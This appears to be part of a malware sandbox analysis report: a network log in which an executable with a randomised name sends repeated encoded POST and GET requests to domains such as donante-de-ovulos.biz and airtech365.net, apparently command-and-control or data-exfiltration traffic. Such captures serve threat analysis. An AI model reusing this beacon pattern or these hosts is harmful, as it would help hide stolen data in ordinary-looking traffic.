                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 75 30 42 67 7a 66 6b 59 6d 77 79 53 57 42 35 79 52 4a 5a 37 6e 41 42 57 46 68 64 43 41 4e 52 4c 2f 7a 69 54 6f 6e 48 38 66 58 50 75 4c 36 6a 4b 67 63 2f 5a 49 34 77 70 75 52 30 33 62 48 59 74 39 56 35 41 55 69 74 64 4d 2f 6d 43 44 47 4d 4b 49 47 76 44 39 75 64 42 4a 6b 4a 43 5a 64 48 44 43 57 57 64 2f 46 62 42 63 6e 4b 6a 4c 53 46 43 45 39 42 45 5a 61 58 7a 7a 61 52 70 55 64 75 68 37 56 7a 55 4e 65 41 43 65 6c 73 34 4c 43 6c 6b 5a 31 72 48 66 51 6a 66 36 32 46 31 54 38 6e 6e 32 4d 6b 30 72 6a 36 51 49 46 72 75 33 67 7a 48 31 63 4c 64 6e 42 6a 78 61 57 34 7a 61 61 35 41 32 76 69 6f 7a 65 55 3d
                                                              Data Ascii: Ux_TPFo=u0BgzfkYmwySWB5yRJZ7nABWFhdCANRL/ziTonH8fXPuL6jKgc/ZI4wpuR03bHYt9V5AUitdM/mCDGMKIGvD9udBJkJCZdHDCWWd/FbBcnKjLSFCE9BEZaXzzaRpUduh7VzUNeACels4LClkZ1rHfQjf62F1T8nn2Mk0rj6QIFru3gzH1cLdnBjxaW4zaa5A2viozeU=
                                                              Sep 25, 2024 09:17:23.497193098 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:23 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1150
                                                              x-request-id: 676f5bc7-2e1c-4bf4-b106-26d27f955fc8
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                              set-cookie: parking_session=676f5bc7-2e1c-4bf4-b106-26d27f955fc8; expires=Wed, 25 Sep 2024 07:32:23 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 32 51 51 53 48 6c 66 78 5a 55 31 5a 38 2b 51 5a 6a 6f 33 58 59 74 4b 30 34 45 36 6c 71 4d 35 35 5a 31 51 78 66 6e 69 68 59 77 51 66 62 66 6b 5a 4b 2f 62 4a 6a 6e 59 2b 63 76 65 49 44 45 31 6f 73 71 2b 4e 6d 7a 75 4f 58 75 74 74 4b 71 31 62 4e 41 7a 4e 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:23.497215033 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjc2ZjViYzctMmUxYy00YmY0LWIxMDYtMjZkMjdmOTU1ZmM4IiwicGFnZV90aW1lIjoxNzI3MjQ4Nj


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.849737199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:25.573515892 CEST772OUTPOST /8lrv/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.donante-de-ovulos.biz
                                                              Origin: http://www.donante-de-ovulos.biz
                                                              Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 75 30 42 67 7a 66 6b 59 6d 77 79 53 58 67 4a 79 58 71 78 37 68 67 42 56 4a 42 64 43 4f 64 52 48 2f 7a 2b 54 6f 6b 4b 68 63 69 66 75 4c 62 54 4b 6a 5a 44 5a 59 6f 77 70 36 68 30 49 47 58 59 6d 39 56 30 31 55 69 52 64 4d 2f 79 43 44 45 55 4b 4c 31 58 4d 39 2b 64 44 63 30 4a 4d 55 39 48 44 43 57 57 64 2f 46 4f 73 63 6e 79 6a 4c 42 64 43 46 63 42 44 61 61 58 73 6b 71 52 70 51 64 75 62 37 56 7a 4d 4e 66 63 73 65 6e 6b 34 4c 44 56 6b 5a 6b 72 45 55 51 6a 56 31 57 45 65 57 4d 4f 6f 79 62 6b 31 68 31 57 57 4a 30 37 74 32 57 65 74 76 2b 44 62 6b 42 4c 61 61 56 51 46 66 74 6b 6f 73 4d 79 59 74 4a 41 65 39 79 72 2f 6b 31 4c 76 57 6c 6c 41 64 37 34 79 48 37 6e 78
                                                              Data Ascii: Ux_TPFo=u0BgzfkYmwySXgJyXqx7hgBVJBdCOdRH/z+TokKhcifuLbTKjZDZYowp6h0IGXYm9V01UiRdM/yCDEUKL1XM9+dDc0JMU9HDCWWd/FOscnyjLBdCFcBDaaXskqRpQdub7VzMNfcsenk4LDVkZkrEUQjV1WEeWMOoybk1h1WWJ07t2Wetv+DbkBLaaVQFftkosMyYtJAe9yr/k1LvWllAd74yH7nx
                                                              Sep 25, 2024 09:17:26.016503096 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:25 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1150
                                                              x-request-id: dc84e6cb-5268-4bf0-8cd8-3bdec397600c
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                              set-cookie: parking_session=dc84e6cb-5268-4bf0-8cd8-3bdec397600c; expires=Wed, 25 Sep 2024 07:32:25 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 32 51 51 53 48 6c 66 78 5a 55 31 5a 38 2b 51 5a 6a 6f 33 58 59 74 4b 30 34 45 36 6c 71 4d 35 35 5a 31 51 78 66 6e 69 68 59 77 51 66 62 66 6b 5a 4b 2f 62 4a 6a 6e 59 2b 63 76 65 49 44 45 31 6f 73 71 2b 4e 6d 7a 75 4f 58 75 74 74 4b 71 31 62 4e 41 7a 4e 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:26.016521931 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGM4NGU2Y2ItNTI2OC00YmYwLThjZDgtM2JkZWMzOTc2MDBjIiwicGFnZV90aW1lIjoxNzI3MjQ4Nj


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.849738199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:28.118437052 CEST1789OUTPOST /8lrv/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.donante-de-ovulos.biz
                                                              Origin: http://www.donante-de-ovulos.biz
                                                              Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 75 30 42 67 7a 66 6b 59 6d 77 79 53 58 67 4a 79 58 71 78 37 68 67 42 56 4a 42 64 43 4f 64 52 48 2f 7a 2b 54 6f 6b 4b 68 63 68 2f 75 4b 74 76 4b 67 2b 58 5a 62 6f 77 70 35 68 30 7a 47 58 59 33 39 57 46 39 55 69 63 67 4d 38 4b 43 41 68 41 4b 63 30 58 4d 75 65 64 44 65 30 4a 42 5a 64 48 57 43 57 6d 52 2f 46 65 73 63 6e 79 6a 4c 41 74 43 44 4e 42 44 63 61 58 7a 7a 61 52 62 55 64 76 56 37 55 62 63 4e 63 77 53 64 58 45 34 4c 6a 46 6b 62 57 54 45 49 41 6a 54 32 57 45 47 57 4d 54 6f 79 64 41 54 68 78 57 77 4a 79 4c 74 37 43 43 33 39 4d 62 59 39 41 44 73 57 30 41 56 55 4d 6c 4c 74 50 61 31 79 5a 73 59 34 56 7a 67 70 6b 50 4f 53 31 73 56 49 64 63 67 43 2b 57 76 48 6f 36 71 46 6e 38 30 74 4d 6e 73 31 6f 4b 56 2f 74 58 49 43 50 52 4a 4e 69 39 51 36 61 61 33 67 50 46 30 45 61 71 2b 48 76 77 54 70 4f 76 67 42 72 70 6d 38 61 79 33 4a 75 74 4d 4f 78 5a 54 70 6c 38 6a 70 53 44 49 54 45 70 68 64 44 75 53 41 4b 45 72 6f 30 4a 4b 70 38 68 36 54 54 55 33 34 6d 32 63 68 52 43 75 68 41 63 62 48 2b [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=u0BgzfkYmwySXgJyXqx7hgBVJBdCOdRH/z+TokKhch/uKtvKg+XZbowp5h0zGXY39WF9UicgM8KCAhAKc0XMuedDe0JBZdHWCWmR/FescnyjLAtCDNBDcaXzzaRbUdvV7UbcNcwSdXE4LjFkbWTEIAjT2WEGWMToydAThxWwJyLt7CC39MbY9ADsW0AVUMlLtPa1yZsY4VzgpkPOS1sVIdcgC+WvHo6qFn80tMns1oKV/tXICPRJNi9Q6aa3gPF0Eaq+HvwTpOvgBrpm8ay3JutMOxZTpl8jpSDITEphdDuSAKEro0JKp8h6TTU34m2chRCuhAcbH+pZ6qsFonc3jSXjhae87yOYChmIbQOb3PvRpmnB9Or3Gkw7mVJTHaQrw6l6PgDou1MjklGxYwvsqVXg7RWwjDgbCziWH1fVxljVktMQBvX8GYfEn175SFy4vrjE0R44A5dlnDUMTmPqUruFY5+A3bmqG3uegpjcO6neFoz6+mVY6GvZ6WSTW0V4s1S21zivjwE17l/6v+1eYtKjMwqTBYw0RjhZO6F75Z8yurY6AIQqLaLgisbAfdRBiQfDCVF/EKz2fkViJSpnNb1/CEMHIaE/7tRONQe5LrNPIw91H0YLENox8leuAFXIWmilpWJaXcadsYgEhhKO7uMXirQzq1saps8DbrkBuYBHD9FtiB1v3IMyH2aD8Yz/ncMCVo8tDidrIA0qpspWdBPHbXEQcbbuMo5KJTmVB8nTgX5V4A9ykvNzN2pG37IIZxwbcm/vt+wxwQf3TZhmcx6w/ftklkxCnXmz4W8gXacOG2VgPLjh5WJnFhBM4GUiCQBd853b85BHJNFvewX6/D7fgMe2Y6sNlT+PMUU78yk4YIhDsENX0K0TA6fxp21sXDkooZ/++vEmyXJYab7QsHX7y5GFkOS9pzyy5WgWGualABcqZkdja29ErZYGGN1IHk8uPoAPQVN2jA3eMeZiPEuESw297c+Nch/n4OJwj22q [TRUNCATED]
                                                              Sep 25, 2024 09:17:28.590084076 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:28 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1150
                                                              x-request-id: f5bdd42b-e230-4a9c-a7a8-b28672aa7848
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==
                                                              set-cookie: parking_session=f5bdd42b-e230-4a9c-a7a8-b28672aa7848; expires=Wed, 25 Sep 2024 07:32:28 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 32 51 51 53 48 6c 66 78 5a 55 31 5a 38 2b 51 5a 6a 6f 33 58 59 74 4b 30 34 45 36 6c 71 4d 35 35 5a 31 51 78 66 6e 69 68 59 77 51 66 62 66 6b 5a 4b 2f 62 4a 6a 6e 59 2b 63 76 65 49 44 45 31 6f 73 71 2b 4e 6d 7a 75 4f 58 75 74 74 4b 71 31 62 4e 41 7a 4e 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Z2QQSHlfxZU1Z8+QZjo3XYtK04E6lqM55Z1QxfnihYwQfbfkZK/bJjnY+cveIDE1osq+NmzuOXuttKq1bNAzNw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:28.590131044 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjViZGQ0MmItZTIzMC00YTljLWE3YTgtYjI4NjcyYWE3ODQ4IiwicGFnZV90aW1lIjoxNzI3MjQ4Nj


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.849739199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:30.661096096 CEST481OUTGET /8lrv/?Ux_TPFo=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.donante-de-ovulos.biz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:31.111341000 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:17:30 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1530
                                                              x-request-id: 2d4cdb4c-7f86-4cc9-966a-5b882f54b984
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_agOEmzVAy+3VDoAd2cbpN/tvjyuDoiI8QwVT0ITzk9mMy9yNxx13LwY8OXKpxEqU5gjo7JYG2ZaOS4FGm9ALrw==
                                                              set-cookie: parking_session=2d4cdb4c-7f86-4cc9-966a-5b882f54b984; expires=Wed, 25 Sep 2024 07:32:31 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 67 4f 45 6d 7a 56 41 79 2b 33 56 44 6f 41 64 32 63 62 70 4e 2f 74 76 6a 79 75 44 6f 69 49 38 51 77 56 54 30 49 54 7a 6b 39 6d 4d 79 39 79 4e 78 78 31 33 4c 77 59 38 4f 58 4b 70 78 45 71 55 35 67 6a 6f 37 4a 59 47 32 5a 61 4f 53 34 46 47 6d 39 41 4c 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_agOEmzVAy+3VDoAd2cbpN/tvjyuDoiI8QwVT0ITzk9mMy9yNxx13LwY8OXKpxEqU5gjo7JYG2ZaOS4FGm9ALrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:17:31.111365080 CEST224INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmQ0Y2RiNGMtN2Y4Ni00Y2M5LTk2NmEtNWI4ODJmNTRiOTg0IiwicGFnZV9
                                                              Sep 25, 2024 09:17:31.111377001 CEST759INData Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 49 33 4d 6a 51 34 4e 6a 55 78 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 5a 47 39 75 59 57 35 30 5a 53 31 6b 5a 53 31 76 64 6e 56 73 62 33 4d 75 59 6d 6c 36 4c
                                                              Data Ascii: 0aW1lIjoxNzI3MjQ4NjUxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG9uYW50ZS1kZS1vdnVsb3MuYml6LzhscnYvP1V4X1RQRm89ajJwQXd2TW1tQ3JZWlZoa2RzNVp2Q1pnT3lvdUVlb3E2aHUyczJUVVBoYllPb1hYOTlidU0rd3d4U0JnZlhjbXpFcHFUQ1ZBRk1DWlFuUXRDVmVMMGRSVllTUmpWZHIvQ2dqcW5XWFRFaW


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.8497403.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:36.214409113 CEST731OUTPOST /i5ct/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.airtech365.net
                                                              Origin: http://www.airtech365.net
                                                              Referer: http://www.airtech365.net/i5ct/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 49 59 54 59 32 4c 59 6a 45 45 78 2f 6a 7a 4d 55 5a 57 55 70 61 30 62 6c 52 77 7a 7a 78 66 2f 54 50 31 71 4e 65 31 73 59 64 61 67 51 6f 6f 43 5a 50 43 66 66 58 2f 37 4f 44 38 4d 38 37 70 43 54 54 4d 6a 4a 30 30 46 32 4e 36 73 6c 2f 5a 47 41 53 36 76 4d 43 49 74 63 56 78 77 45 4c 2b 2b 49 77 7a 65 36 4b 75 6e 4c 48 58 4a 57 7a 50 6e 6c 55 64 65 69 6a 48 70 4f 58 4d 34 46 48 70 77 49 6b 48 69 52 58 70 73 6c 2b 48 34 31 51 74 57 65 61 57 4d 47 38 75 33 75 4a 56 42 4e 6c 69 32 2f 41 44 6c 6a 58 64 48 65 33 58 55 50 79 73 4a 41 64 50 76 74 4e 44 32 41 73 74 30 54 7a 53 61 4b 72 6d 45 4b 36 5a 67 3d
                                                              Data Ascii: Ux_TPFo=IYTY2LYjEEx/jzMUZWUpa0blRwzzxf/TP1qNe1sYdagQooCZPCffX/7OD8M87pCTTMjJ00F2N6sl/ZGAS6vMCItcVxwEL++Iwze6KunLHXJWzPnlUdeijHpOXM4FHpwIkHiRXpsl+H41QtWeaWMG8u3uJVBNli2/ADljXdHe3XUPysJAdPvtND2Ast0TzSaKrmEK6Zg=


